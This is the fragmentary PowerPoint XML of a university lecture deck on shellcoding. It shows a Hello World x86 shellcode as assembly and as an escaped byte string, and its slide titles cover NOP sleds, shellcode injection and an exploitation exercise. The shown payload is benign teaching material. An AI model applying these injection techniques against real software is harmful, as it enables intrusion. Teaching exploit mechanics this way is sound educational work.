                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3222386" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3222386" y="279053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27905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3400" y="1739261"/>
            <a:ext cx="3886200" cy="361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 indent="-518159">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="530225" algn="l"/>
                <a:tab pos="530860" algn="l"/>
              </a:tabLst>
            </a:pP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Defining</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" spc="-1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000" strike="sngStrike" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="2000" strike="sngStrike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Hello World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Shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="2000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Linux System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Calls</a:t>
            </a:r>
            <a:endParaRPr sz="2000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Writing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Shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="2000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Shellcode in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Exploitation</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="530225" indent="-518159">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="530225" algn="l"/>
                <a:tab pos="53086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Additional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Notes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32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477706"/>
            <a:ext cx="50450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Hello </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>World</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Shellcode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27225" y="2115021"/>
            <a:ext cx="806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message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138" y="1867371"/>
            <a:ext cx="125349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user_code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12700" marR="5080" indent="893444">
              <a:lnSpc>
                <a:spcPct val="101600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp  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write_str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14608" y="2675307"/>
          <a:ext cx="1850389" cy="267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422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xor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510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eax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10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eax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xor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ebx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ebx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xor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edx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edx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mov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eax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8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mov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ebx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8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pop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ecx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mov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edx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0x80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mov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eax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8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4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FF9900"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>xor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ebx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85"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1600" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00FFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>ebx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675"/>
                        </a:lnSpc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0x80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40110" y="5086815"/>
            <a:ext cx="1586230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337820" indent="893444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FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int  </a:t>
            </a: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message</a:t>
            </a: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906144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FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>call</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90487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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>.ascii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7196" y="5582114"/>
            <a:ext cx="180975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41275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FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>write_str 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"Hello,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-9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World\n"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4764" y="5208374"/>
            <a:ext cx="4839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https://defuse.ca/online-x86-assembler.htm#disassembly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21789" y="1936202"/>
            <a:ext cx="3222625" cy="279400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3222625" h="279400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3222386" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3222386" y="279053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2790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09089" y="1866352"/>
            <a:ext cx="3241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Machine code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string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constant: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3209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5009089" y="2277955"/>
            <a:ext cx="3246755" cy="15305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solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\xEB\x21\x31\xC0\x31\xDB\x31\xD2</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="5080" algn="r">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\xB8\x04\x00\x00\x00\xBB\x01\x00</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="5080" algn="r">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x00\x00\x59\xBA\x0D\x00\x00\x00</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="5080" algn="r">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\xCD\x80\xB8\x01\x00\x00\x00\x31</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="109855">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\xDB\xCD\x80\xE8\xDA\xFF\xFF\xFF</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="109855">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x48\x65\x6C\x6C\x6F\x2C\x20\x57</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="109855">
              <a:lnSpc>
                <a:spcPts val="1664"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x6F\x72\x6C\x64\x0A"</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill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16419" y="3952323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53</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="180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Bytes</a:t>
            </a:r>
            <a:endParaRPr sz="18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242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6248387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82" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="45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98" y="152399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65" y="0"/>
                </a:lnTo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0222" y="542275"/>
            <a:ext cx="228917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00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x00 or Null</a:t>
            </a:r>
            <a:endParaRPr sz="3600" b="1" spc="-5" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F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274" y="1885178"/>
            <a:ext cx="7684770" cy="14770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When shellcode is read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 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string, null bytes become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issue  with common string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functions.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Solution: Make your shellcode NULL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free!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274" y="3694925"/>
            <a:ext cx="2402840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instruction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ts val="2865"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="1383665" algn="l"/>
                <a:tab pos="2221865" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>v	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ea</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>x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,	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3667" y="4056874"/>
            <a:ext cx="404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FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-100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00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>“\xB8\x04\x00\x00\x00”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3274" y="4780773"/>
            <a:ext cx="2428240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can be replaced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by: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ts val="2865"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="1383665" algn="l"/>
                <a:tab pos="2054225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mov	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>al</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,	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3677" y="5142722"/>
            <a:ext cx="2033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FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-105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00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>“\xb0\x04”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1A2D8C97-54AE-4471-A6A2-611B0FFE4A61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44752" y="6467703"/>
            <a:ext cx="196504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AFEF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GB" spc="-5" dirty="0"/>
              <a:t>APU - CBE : 22 February 2020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31546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</TotalTime>
  <Words>3447</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>652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MS UI Gothic</vt:lpstr>
      <vt:lpstr>Yu Gothic</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Shellcoding</vt:lpstr>
      <vt:lpstr>Defining Shellcode</vt:lpstr>
      <vt:lpstr>Origins of the Name</vt:lpstr>
      <vt:lpstr>Shellcode as C</vt:lpstr>
      <vt:lpstr>Shellcode as x86</vt:lpstr>
      <vt:lpstr>Shellcode as a String</vt:lpstr>
      <vt:lpstr>Shellcoding</vt:lpstr>
      <vt:lpstr>Hello World Shellcode</vt:lpstr>
      <vt:lpstr>\x00 or Null</vt:lpstr>
      <vt:lpstr>Hello World with NULL Bytes</vt:lpstr>
      <vt:lpstr>Hello World without NULL Bytes</vt:lpstr>
      <vt:lpstr>Optimizing Hello World</vt:lpstr>
      <vt:lpstr>Common Tricks</vt:lpstr>
      <vt:lpstr>Shellcoding</vt:lpstr>
      <vt:lpstr>Linux System Calls</vt:lpstr>
      <vt:lpstr>Libc Wraps Syscalls</vt:lpstr>
      <vt:lpstr>Libc Wraps Syscalls</vt:lpstr>
      <vt:lpstr>Using Syscalls in Shellcode</vt:lpstr>
      <vt:lpstr>Hello World (Revisited)</vt:lpstr>
      <vt:lpstr>Hello World (Revisited)</vt:lpstr>
      <vt:lpstr>Syscall Summary</vt:lpstr>
      <vt:lpstr>Shellcoding</vt:lpstr>
      <vt:lpstr>Writing Shellcode</vt:lpstr>
      <vt:lpstr>Compiling Shellcode</vt:lpstr>
      <vt:lpstr> Side Note:_______  Stages of  Compilation</vt:lpstr>
      <vt:lpstr>Testing Shellcode - exit(0);</vt:lpstr>
      <vt:lpstr>Testing Shellcode</vt:lpstr>
      <vt:lpstr>Hello World Shellcode</vt:lpstr>
      <vt:lpstr>Testing Shellcode - Hello, World</vt:lpstr>
      <vt:lpstr>Testing Shellcode</vt:lpstr>
      <vt:lpstr>Shellcoding Tools We &lt;3</vt:lpstr>
      <vt:lpstr>asm / disasm</vt:lpstr>
      <vt:lpstr>Shellcoding</vt:lpstr>
      <vt:lpstr>Shellcode in Exploitation</vt:lpstr>
      <vt:lpstr>inject.c</vt:lpstr>
      <vt:lpstr>More Relevant Shellcode</vt:lpstr>
      <vt:lpstr>Pre-made Shellcode</vt:lpstr>
      <vt:lpstr>NOP Sleds</vt:lpstr>
      <vt:lpstr>NOP Sleds</vt:lpstr>
      <vt:lpstr>NOP Sleds</vt:lpstr>
      <vt:lpstr>Solving ./inject</vt:lpstr>
      <vt:lpstr>Party like It’s ‘99</vt:lpstr>
      <vt:lpstr>Shellcoding</vt:lpstr>
      <vt:lpstr>Function Constraints</vt:lpstr>
      <vt:lpstr>Little Endian</vt:lpstr>
      <vt:lpstr>Little Endian</vt:lpstr>
      <vt:lpstr>Alphanumeric Shellcode</vt:lpstr>
      <vt:lpstr>Alphanumeric Shellcode</vt:lpstr>
      <vt:lpstr>Reduce, Reuse, Recycle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and Basic Reverse Engineering</dc:title>
  <cp:lastModifiedBy>MOHAMAD REDZA IZUDIN BIN ABU ZAHARIN</cp:lastModifiedBy>
  <cp:revision>41</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-02-15T18:36:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-21T16:25:26Z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2020-02-15T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>